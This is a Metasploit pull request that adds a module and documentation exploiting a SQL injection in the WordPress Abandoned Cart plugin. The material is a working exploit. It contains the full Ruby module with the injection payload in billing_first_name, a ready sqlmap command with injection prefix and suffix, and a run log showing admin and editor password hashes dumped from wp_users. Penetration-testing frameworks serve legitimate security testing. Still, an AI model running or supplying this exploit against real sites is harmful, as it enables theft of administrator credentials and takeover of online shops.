### PR TITLE
WordPress Plugin: Abandoned Cart SQLi

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.md
@@ -1,0 +1,89 @@
+## Vulnerable Application
+
+Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,
+prior to 5.8.4 is affected by an unauthenticated SQL injection via the
+billing_first_name parameter of the save_data AJAX call.  A valid
+wp_woocommerce_session cookie is required, which has at least one item in the
+cart.
+
+The plugin can be downloaded from
+[here](https://downloads.wordpress.org/plugin/woocommerce-abandoned-cart.5.8.3.zip)
+
+You'll need to first install WooCommerce and set up a shop with at least one item.
+Next, install and activate Abandoned Cart.
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap -u http://local.target/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=wpdeeply&billing_last_name=wpdeeply&billing_company=wpdeeply&billing_address_1=wpdeeply&billing_address_2=wpdeeply&billing_city=wpdeeply&billing_state=wpdeeply&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=wpdeeply%40protonmail.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- wpdeeply" --dbms mysql --technique=T --time-sec=1
+```
+
+## Verification Steps
+
+1. Install the plugin on wordpress
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_abandoned_cart_sqli`
+1. Do: `set rhosts [ip]`
+1. Do: `set cookie [cookie]`
+1. Do: `run`
+1. You should get username and password hashes.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COOKIE
+
+A valid `wp_woocommerce_session` cookie, which has at least 1 item in the cart.  An example is:
+`wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57`.
+
+### COUNT
+
+If Action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Wordpress 5.4.2 with WooCommerce 4.8.0 and Abandoned Cart 5.8.1 on Ubuntu 20.04 using MariaDB 10.3.22
+
+```
+resource (abandoned.rb)> use auxiliary/scanner/http/wp_abandoned_cart_sqli
+resource (abandoned.rb)> set rhosts 111.111.1.111
+rhosts => 111.111.1.111
+resource (abandoned.rb)> set verbose true
+verbose => true
+resource (abandoned.rb)> set cookie "wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57"
+cookie => wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57
+resource (abandoned.rb)> set count 3
+count => 3
+resource (abandoned.rb)> run
+[*] Checking /wp-content/plugins/woocommerce-abandoned-cart/readme.txt
+[*] Found version You in the plugin
+[+] Vulnerable version detected
+[*] Nonce: b56eb3a2cb
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(PghfuFZ) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) PghfuFZ from wp_users limit 3) eOMLbNMh)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_abandoned_cart_sqli) > creds
+Credentials
+===========
+
+host  origin         service  public  private                             realm  private_type        JtR Format
+----  ------         -------  ------  -------                             -----  ------------        ----------
+      111.111.1.111           admin2  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
+      111.111.1.111           editor  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
+      111.111.1.111           admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass
+```

--- a/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
@@ -76,29 +76,29 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Nonce: #{nonce}")
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      # required or you get values like <> for username and *)/?*//-?//>/?=)+ for password hash
       if payload.include?('<')
         payload.gsub!(/<>/, '=')
         payload.gsub!(/(sleep\(\d+\.?\d*\)),0/) { '0,' + Regexp.last_match(1) }
       end
 
-      # XXX change values
       res = send_request_cgi({
         'method' => 'POST',
         'cookie' => datastore['COOKIE'],
-        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
+        #'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
         'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
         'vars_post' => {
-          'billing_first_name' => "wpdeeply','','','','',( TRUE AND #{payload})) -- a",
-          'billing_last_name' => 'wpdeeply',
-          'billing_company' => 'wpdeeply',
-          'billing_address_1' => 'wpdeeply',
-          'billing_address_2' => 'wpdeeply',
-          'billing_city' => 'wpdeeply',
-          'billing_state' => 'wpdeeply',
-          'billing_postcode' => '123234',
-          'billing_country' => 'GB',
-          'billing_phone' => '12324',
-          'billing_email' => 'wpdeeply@protonmail.com',
+          'billing_first_name' => "#{Rex::Text.rand_text_alpha_lower(6)}','','','','',( TRUE AND #{payload})) -- #{Rex::Text.rand_text_alpha_lower(1)}",
+          'billing_last_name' => Rex::Text.rand_surname(),
+          'billing_company' => '',
+          'billing_address_1' => Rex::Text.rand_text_alpha(8),
+          'billing_address_2' => '',
+          'billing_city' => Rex::Text.rand_text_alpha(6),
+          'billing_state' => Rex::Text.rand_state(),
+          'billing_postcode' => Rex::Text.rand_text_numeric(6),
+          'billing_country' => Rex::Text.rand_country(),
+          'billing_phone' => Rex::Text.rand_text_numeric(9),
+          'billing_email' => "#{Rex::Text.rand_surname()}@#{Rex::Text.rand_text_alpha_lower(6)}.com",
           'order_notes' => '',
           'wcal_guest_capture_nonce' => nonce,
           'action' => 'save_data'

--- a/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb
@@ -1,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Abandoned Cart for WooCommerce SQLi Scanner',
+        'Description' => %q{
+          Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,
+          prior to 5.8.4 is affected by an unauthenticated SQL injection via the
+          billing_first_name parameter of the save_data AJAX call.  A valid
+          wp_woocommerce_session cookie is required, which has at least one item in the
+          cart.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'WPDeeply', # Discovery and PoC
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['WPVDB', '10461'],
+            ['URL', 'https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/'],
+            ['URL', 'https://plugins.trac.wordpress.org/changeset/2413885']
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2020-11-05'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1]),
+      OptString.new('CHECKOUTURL', [true, 'Checkout URL', '/index.php/checkout/']),
+      OptString.new('COOKIE', [true, 'Cookie with an item in the shopping cart. Must contain wp_woocommerce_session', ''])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('woocommerce-abandoned-cart', '5.8.4')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('Abandoned Cart for WooCommerce version not vulnerable')
+      return
+    end
+    print_good('Vulnerable version detected')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, datastore['CHECKOUTURL']),
+      'cookie' => datastore['COOKIE']
+    })
+
+    fail_with Failure::Unreachable, 'Connection failed' unless res
+
+    unless res.body =~ /name="wcal_guest_capture_nonce" value="([^"]*)"/
+      print_error('Unable to find wcal_guest_capture_nonce')
+      return
+    end
+    nonce = Regexp.last_match[1]
+    print_status("Nonce: #{nonce}")
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      if payload.include?('<')
+        payload.gsub!(/<>/, '=')
+        payload.gsub!(/(sleep\(\d+\.?\d*\)),0/) { '0,' + Regexp.last_match(1) }
+      end
+
+      # XXX change values
+      res = send_request_cgi({
+        'method' => 'POST',
+        'cookie' => datastore['COOKIE'],
+        'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+        'vars_post' => {
+          'billing_first_name' => "wpdeeply','','','','',( TRUE AND #{payload})) -- a",
+          'billing_last_name' => 'wpdeeply',
+          'billing_company' => 'wpdeeply',
+          'billing_address_1' => 'wpdeeply',
+          'billing_address_2' => 'wpdeeply',
+          'billing_city' => 'wpdeeply',
+          'billing_state' => 'wpdeeply',
+          'billing_postcode' => '123234',
+          'billing_country' => 'GB',
+          'billing_phone' => '12324',
+          'billing_email' => 'wpdeeply@protonmail.com',
+          'order_notes' => '',
+          'wcal_guest_capture_nonce' => nonce,
+          'action' => 'save_data'
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good(table.to_s)
+  end
+end


### PR DESCRIPTION
This PR adds a SQLi for Abandoned Cart, a wordpress plugin which requires WooCommerce.  Check the docs for instructions, its not complicated, but you need WooCommerce all setup with a product.  Then add Abandoned Cart.  

After install, for exploitation, you'll need to Add an item to a cart, and get your cookie.  See docs, I spell it out more.

## Verification

- [ ] Install the plugin on wordpress
- [ ] Start msfconsole
- [ ]  Do: `use auxiliary/scanner/http/wp_abandoned_cart_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `set cookie [cookie]`
- [ ]  Do: `run`
